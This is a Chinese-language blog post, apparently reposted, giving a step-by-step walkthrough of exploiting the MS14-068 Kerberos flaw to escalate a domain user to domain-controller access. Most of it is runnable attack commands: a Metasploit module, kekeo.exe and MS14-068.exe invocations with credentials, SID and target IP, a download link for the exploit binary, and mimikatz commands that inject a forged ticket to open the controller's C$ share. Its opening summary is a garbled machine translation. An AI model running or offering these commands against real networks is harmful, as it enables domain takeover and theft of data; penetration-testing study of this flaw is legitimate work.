[域渗透]MS14-068利用

摘要:
1、 通过使用需要域帐户的帐户密码,使用明文网络组“domaincontrollers”/domain获取主域控制器地址。使用msf检测漏洞。如果成功利用该漏洞,将生成bin文件poc:useafficial/admin/kerberos/ms14 _068_kerberos_校验和利用工具:https://github.com/gentilkiwi/kekeo/releases

一、利用

需要拥有一个域账号的账号密码明文

net group "domain controllers" /domain 获取主域控地址

使用msf对其漏洞进行检测,如果漏洞利用成功会生成一个bin文件

poc:use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

[域渗透]MS14-068利用第1张

利用工具:https://github.com/gentilkiwi/kekeo/releases

上传exp至临时目录

klist 列出票据
klist purge 清除票据

[域渗透]MS14-068利用第2张

kekeo.exe "exploit::ms14068 /domain:yiwang.com /user:admin123 /password:admin@AAA... /ptt" "exit"

漏洞利用成功后成功访问域控c$目录

[域渗透]MS14-068利用第3张

方法二、

防止以msf爆出神奇操作,以msf检测漏洞为标准的情况所以...

[域渗透]MS14-068利用第4张

MS14-068:https://raw.githubusercontent.com/abatchy17/WindowsExploits/master/MS14-068/MS14-068.exe

漏洞利用:

Ms14-068.exe -u user1@humensec.com -p user@123 -s S-1-5-21-3858644736-3974512303-642681968-1134 -d 192.168.3.12

漏洞利用成功后桌面会生成 .ccache文件,证明存在MS16-068

mimikatz# kerberos::purge#清除原有票据

mimikatz# kerberos::list #列出当前票据,确保清除干净

mimikatz# kerberos::ptc TGT_XXX.ccache#将伪造的TGT导入内存

dir \域控\c$

多dir几次有可能会拒绝访问

参考链接:

https://www.cnblogs.com/yuzly/p/10859520.html

免责声明:文章转载自《[域渗透]MS14-068利用》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇02 配置文件phantomjs 设置代理下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

网络渗透资料大全单——漏洞库篇

漏洞库 NVD        ——美国国家漏洞库      →http://nvd.nist.gov/。 CERT        ——美国国家应急响应中心      →https://www.us-cert.gov/ OSVDB        ——开源漏洞库      →http://osvdb.org Bugtraq        —...

文件上传漏洞(绕过姿势)

文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上传文件校验方式,以及绕过校验的各种姿势,最后对此漏洞提几点防护建议。(根据个人...

[ 中间件漏洞 ] Tomcat 管理界面弱口令+war后门部署

前言:   Tomcat 支持在后台部署war包,可以直接将webshell部署到web目录下,如果tomcat后台管理用户存在弱口令,这很容易被利用上传webshell。 漏洞复现: 漏洞原理:   Tomcat后台管理界面的用户配置文件为conf目录下的tomcat-users.xml。   登录Tomcat的后台管理界面,上传war包  上传成功...

逻辑漏洞小结之SRC篇

最近在挖各大src,主要以逻辑漏洞为主,想着总结一下我所知道的一些逻辑漏洞分享一下以及举部分实际的案例展示一下,方便大家理解。 主要从两个方面看,业务方面与漏洞方面。(接下来就从拿到网站的挖掘步骤进行逐一介绍各个逻辑漏洞) 一 、业务 注册: 1.短信轰炸/验证码安全问题/密码爆破/邮箱轰炸 上面这个属于利用了burp中的intruder插件遍历了差数,导...

【漏洞分析】dedecms有前提前台任意用户密码修改

 0x00 前言 早上浏览sec-news,发现锦行信息安全发布了一篇文章《【漏洞分析】 织梦前台任意用户密码修改》,看完之后就想着自己复现一下。 该漏洞的精髓是php的弱类型比较,'0.0' == '0',也有一定的限制,只对没有设置安全问题的用户有效(默认是没有设置的)。 0x01 漏洞版本 我复现的是DedeCMS V5.7 SP2正式版,2018-...

漏洞挖掘分析技术综述

1.引言网络安全已成为人们日益关注的重要问题。据CNCERT/CC2007年网络安全工作报告的统计,近年来漏洞数量呈现明显上升趋势,不仅如此,新漏洞从公布到被利用的时间越来越短,黑客对发布的漏洞信息进行分析研究,往往在极短时间内就能成功利用这些漏洞。除了利用已知漏洞,黑客们也善于挖掘并利用一些尚未公布的漏洞,发起病毒攻击,或出售漏洞资料,满足经济目的。相对...